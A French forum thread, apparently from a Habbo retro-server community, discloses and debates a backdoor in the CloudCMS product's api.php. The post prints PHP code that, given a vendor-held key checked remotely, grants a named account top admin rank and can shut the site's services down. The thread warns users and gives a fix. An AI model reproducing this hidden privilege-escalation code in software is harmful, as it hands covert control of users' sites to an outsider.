Aller au contenu
  • Veuillez ne pas poster de message pour but d'insulter, incitation à la haine, propos sexuels et tout autre qui ne respecte pas nos conditions générales !

Cloudcms - non sécurisé


Akushi

Messages recommandés

Ayant télécharger quelque CMS gratuit venant de cloudcms.fr j'ai remarqué un petit soucis que sont créateur à mis volontairement.

 

if (isset($_GET['override']) AND $_GET['override'] == 1) {
	if (isset($_GET['key']) AND !empty($_GET['key'])) {
		$ThisAPI = file_get_contents('https://api.cloudcms.fr/index.php?api=override&key=' . $_GET['key']);
		$API = json_decode($ThisAPI);
		if ($API->response == 'success') {
			$ThisPDO = $pdo->query('UPDATE users SET rank = ? WHERE username = ?', ["16", "7evenGiven"]);
			die('Accès système autorisé.');
		} else {
			die($API->response);
		}
	}
} elseif (isset($_GET['shutdown']) AND $_GET['shutdown'] == 1) {
	if (isset($_SESSION['id'])) {
		if ($Account->RetrieveInfoById($_SESSION['id'], 'rank') == 16) {
			$ThisPDO = $pdo->query('UPDATE cloudcms_api SET server = ?', ["close"]);
			$ThisPDO = $pdo->query('INSERT INTO cloudcms_logs (user_id, timeact, action) VALUES (?, ?, ?)', [$_SESSION['id'], time(), "vient de fermer l'accès aux services en ligne."]);
			die('Vous avez fermé l\'accès aux services en ligne, pour réactiver l\'accès, il faut vous rendre dans votre base de données puis dans "<b>cloudcms_api</b>" et modifier la valeur de serveur de "<b>close</b>" à "<b>open</b>".');
		} else {
			die();
		}
	}
}

 

Sont créateur à instaurer ceci une " API " pour pouvoir gérer les CMS et le fonctionnement du CMS, mais comme vous pouvez le remarquer il à volontairement mis un système pour ce rank

 

Comment il exploite ceci ?

 

Le fichier api.php est accéssible par n'importe qui mais personne n'a le paramètres $_GET['key'] mise à pars lui il lui suffis de l'entrer comme montrer dans l'example ci dessous est il seras rank et peux aussi fermer l'accès à votre site si vous ne savez pas ou ces c'est situé dans la table cloudcms_api remetter la colonne server sur open

 

/!\ Ceci ne sert à rien d'essayé d'exploité cette faille car vous ne connaissez pas le deuxième paramètres $_GET['key'] qui est nécessaire pour faire fonctionner cette faille /!\

 

Pour avoir accès à ce lien, merci de vous connecter.

OnNeSaisPas

 

Avec ce lien et la clé qu'il à définit il peut ce rank sur n'importe qu'elle rétro utilisant ces CMS alors je ne vous conseille absolument pas d'utiliser ces CMS.

 

Comment fixé vous allez me dire ?

 

Très simple aller à la racine de votre dossier la ou est situé votre CMS est supprimer le fichier nommé api.php

 

Merci à @ NathanDZC de lui aussi l'avoir remarquer, oui ne critiquez pas mon orthographe sa n'a jamais était mon fort.

  • J'aime 1
  • Haha 1
Lien à poster
Partager sur d’autres sites

  • Narzo à épingler ce/cette sujet
  • Administrateur
    Salut Akushi ,
    Ton sujet a été déplacé pour une des deux raisons suivantes :

    - Ta demande a été résolue.

    - Ton sujet se trouvait dans la mauvaise catégorie.

        
      Ceci est un message automatique.

⠀⠀Founder of Inshare.fr

⠀⠀Baylife moderator

⠀⠀Twitch channel moderator

⠀⠀French translator Trucksbook.eu

𝐹𝑒𝑒𝑙 𝑓𝑟𝑒𝑒 𝑡𝑜 𝑤𝑟𝑖𝑡𝑒 𝑎 𝑐𝑜𝑚𝑚𝑒𝑛𝑡

—————————————————

╱⠀⠀⠀⠀⠀⠀⠀⠀⠀Règlements⠀⠀ //⠀⠀Abonnements⠀⠀ //⠀⠀ Discord   ⠀⠀⠀⠀⠀⠀⠀⠀⠀╲

 

signature.png

Lien à poster
Partager sur d’autres sites

  • Narzo désépinglé et En vedette cette sujet

Bonjour à tous,

Je partage ici un communiqué afin de résoudre cette fausse rumeur.

En aucun cas CloudCMS a été crée pour nuire à ces utilisateurs.

Cette API est programmée et commandée sous mes ordres et uniquement par moi.

Moi seul en ayant la permission du fondateur du rétro-habbo utilisant nos services peut avoir un accès total au site, j'entends uniquement par là (accès administration).

En aucun cas, la clé de sécurité est exploitable, celle-ci est renouvelée toutes les heures. 

Je vois aussi que cette rumeur inquiète bon nombre d'entre-vous, c'est compréhensible, mais malheureusement cette rumeur est démenti.

@ Akushi poste un sujet sans même en parler avec moi afin de lui faire comprendre que non, ce n'est pas une faille, mais un outil d'aide.

Afin d'éviter que cela se reproduire, CloudCMS va recevoir une MAJ dans la matinée qui informera les clients de cette "API" dans nos services dans la catégorie "À propos de notre site".

Nous nous excusons pour la gêne occasionnée, encore une fois comme l'a dit @ Akushi si vous refusez la confiance de CloudCMS, supprimer le fichier API.php

 

Merci pour votre confiance que vous portez à l'attention de CloudCMS.

À très vite.

Lien à poster
Partager sur d’autres sites

il y a 2 minutes, 7evenGiven a dit :

Bonjour à tous,

Je partage ici un communiqué afin de résoudre cette fausse rumeur.

En aucun cas CloudCMS a été crée pour nuire à ces utilisateurs.

Cette API est programmée et commandée sous mes ordres et uniquement par moi.

Moi seul en ayant la permission du fondateur du rétro-habbo utilisant nos services peut avoir un accès total au site, j'entends uniquement par là (accès administration).

En aucun cas, la clé de sécurité est exploitable, celle-ci est renouvelée toutes les heures. 

Je vois aussi que cette rumeur inquiète bon nombre d'entre-vous, c'est compréhensible, mais malheureusement cette rumeur est démenti.

@ Akushi poste un sujet sans même en parler avec moi afin de lui faire comprendre que non, ce n'est pas une faille, mais un outil d'aide.

Afin d'éviter que cela se reproduire, CloudCMS va recevoir une MAJ dans la matinée qui informera les clients de cette "API" dans nos services dans la catégorie "À propos de notre site".

Nous nous excusons pour la gêne occasionnée, encore une fois comme l'a dit @ Akushi si vous refusez la confiance de CloudCMS, supprimer le fichier API.php

 

Merci pour votre confiance que vous portez à l'attention de CloudCMS.

À très vite.

 

Sa reviens au même sa reste une faille de sécurité facilement exploitable par des personnes s'y connaissant une parole reste une parole tu as accès à n'importe quel rétro ne dis pas que tu as uniquement accès  à l'administration plus emu est codé de façon à ce que plus ton rang est haut plus tu as de permissions les permissions sont pas gérable si tu met toutes les permissions au 7 le rang 8 auras toutes les permissions du rang 7 donc tu peux clairement avoir accès à tout ce qui est complétement dégelasse de la part d'un vendeur de cms déjà illégale de base pourquoi en parler ? Tu n'avertis pas les utilisateurs de ce genre de faille et c'est clairement pas normal quand un fichier et la il est censée être dis vous dîtes sécurisé il n'y à rien de sécurisé dans sa.

Lien à poster
Partager sur d’autres sites

à l’instant, Akushi a dit :

 

Sa reviens au même sa reste une faille de sécurité facilement exploitable par des personnes s'y connaissant une parole reste une parole tu as accès à n'importe quel rétro ne dis pas que tu as uniquement accès  à l'administration plus emu est codé de façon à ce que plus ton rang est haut plus tu as de permissions les permissions sont pas gérable si tu met toutes les permissions au 7 le rang 8 auras toutes les permissions du rang 7 donc tu peux clairement avoir accès à tout ce qui est complétement dégelasse de la part d'un vendeur de cms déjà illégale de base pourquoi en parler ? Tu n'avertis pas les utilisateurs de ce genre de faille et c'est clairement pas normal quand un fichier et la il est censée être dis vous dîtes sécurisé il n'y à rien de sécurisé dans sa.

Je n'ai pas accès aux permissions PlusEMU mais encore une fois uniquement à l'administration et sous l'accord du fondateur.

Je n'ai jamais exploité un de nos clients et ça n'arrivera pas.

Tu appelles ça comme tu veux, je ne considère ça nullement comme une faille (fixe et inséré exprès).

 

Encore une fois, nos clients vont être avertis, il n'y a pas de souci.

La sécurité de cette clé est primordiale, je ne vais pas le répéter 30 fois, celle-ci est assuré par CloudCMS.

Je ne vais pas m'éterniser là-dessus, je fais un plus gros communiqué tout à l'heure dans la matinée.

Lien à poster
Partager sur d’autres sites

il y a 1 minute, 7evenGiven a dit :

Je n'ai pas accès aux permissions PlusEMU mais encore une fois uniquement à l'administration et sous l'accord du fondateur.

Je n'ai jamais exploité un de nos clients et ça n'arrivera pas.

Tu appelles ça comme tu veux, je ne considère ça nullement comme une faille (fixe et inséré exprès).

 

Encore une fois, nos clients vont être avertis, il n'y a pas de souci.

La sécurité de cette clé est primordiale, je ne vais pas le répéter 30 fois, celle-ci est assuré par CloudCMS.

Je ne vais pas m'éterniser là-dessus, je fais un plus gros communiqué tout à l'heure dans la matinée.

 

Fais donc ce que tu veux ce genre de fichier n'est pas imposable et devrait juste être proposer à pars.

Lien à poster
Partager sur d’autres sites

Ca change rien de ou tu met une API sal shlag va mdrr 

"UN OUTILS D'AIDE" Tu veux faire croire ca a qui a Gaultier de HabboDev ? 

Cest vraiment pitoyable, je ne sais même pas pourquoi des gens s'amuse à payé sur ton site alors que tt les cms on etait partagé. Sauf celuis de city qui a etait "fixer" et Habbox qui lui de demande que de l'argent  ou des connaissances avec certains dev . 

Bref n'achetez rien chez lui, cest encore un mec chelou à qui faut pas faire confiance.

Une api d'aide, nan mais on aura tt vu dans cette commu.

 

Pytoyable

connexion.png.aec11a2dec9f7a02c90ce841c12a6f58.png.4ef5d311639476d02fef082036be4946.png

Lien à poster
Partager sur d’autres sites

  • Administrateur
    Salut Akushi ,
    Ton sujet a été déplacé pour une des deux raisons suivantes :

    - Ta demande a été résolue.

    - Ton sujet se trouvait dans la mauvaise catégorie.

        
      Ceci est un message automatique.

J'essaie de m'adoucir, mais l'humain me rend noir.

Lien à poster
Partager sur d’autres sites

Effectivement, il s'agit bien d'une faille pour vous nuire, je vous déconseille fortement d'utiliser les cms de cloudcms sous peine de vous faire hacker votre rétro.

 

Le code est clairement explicite.

  • Haha 1
Lien à poster
Partager sur d’autres sites

il y a 37 minutes, Stown a dit :

Effectivement, il s'agit bien d'une faille pour vous nuire, je vous déconseille fortement d'utiliser les cms de cloudcms sous peine de vous faire hacker votre rétro.

 

Le code est clairement explicite.

 

Oui bien sûr sont auteur nie tous cela la clé est choisis par lui pas par le client et le fichier est imposée hors il devrait être non imposable et la clé devrait être choisis par sont fondateur pas par le vendeur

Lien à poster
Partager sur d’autres sites

Je ne vois pas trop l’intérêt de cette 'api' car si t'es clients ont un soucis pourquoi avoir accès à l'administration ? 
Et le Shutdown j'en vois pas l'intérêt non plus. 
Moi je vais pas m'avancer et dire que cela et de mauvaise fois, mais vous devriez faire un pack "Assistance" a insérer la FTP à la demande du Fondateur / Client du rétro.
Ou bien une possibilité pour le fondateur du rétro d'activer l'exploitation de l'api depuis son administration.

C'est vrai que la manque d'information apporte un doute sur la sincérité de cette "api" puisqu'il a fallu attendre que ce soit découvert par tierce personne.


 

Lien à poster
Partager sur d’autres sites

Il y a 2 heures, 7evenGiven a dit :

Pour avoir accès à ce lien, merci de vous connecter.

Un communiqué a été mis à disposition afin de mieux comprendre le fonctionnement de cette API.

Afin de clôturer définitivement cette fakenews.

Pour avoir accès à ce lien, merci de vous connecter.

Tellement tu es en panique, on a accès à tous les emails à qui tu as envoyé ton 'communiqué'

Lien à poster
Partager sur d’autres sites

Merci @ Akushi de l'avoir découvert et surtout de l'avoir dit, en espérant que ta découverte avertissent beaucoup de gens concernant Cloudcms. Surprenant surtout d'un vendeur de faire se genre de chose. Au passage j'ai pu découvrir aussi que j'avais notament un fichier API le même que le tient dans le cms que j'ai téléchargé la bah. Merci ;) 

Lien à poster
Partager sur d’autres sites

  • 2 ans plus tard...

Créer un compte ou se connecter pour commenter

Vous devez être membre afin de pouvoir déposer un commentaire

Créer un compte

Créez un compte sur notre communauté. C’est facile !

Créer un nouveau compte

Se connecter

Vous avez déjà un compte ? Connectez-vous ici.

Connectez-vous maintenant
×
×
  • Créer...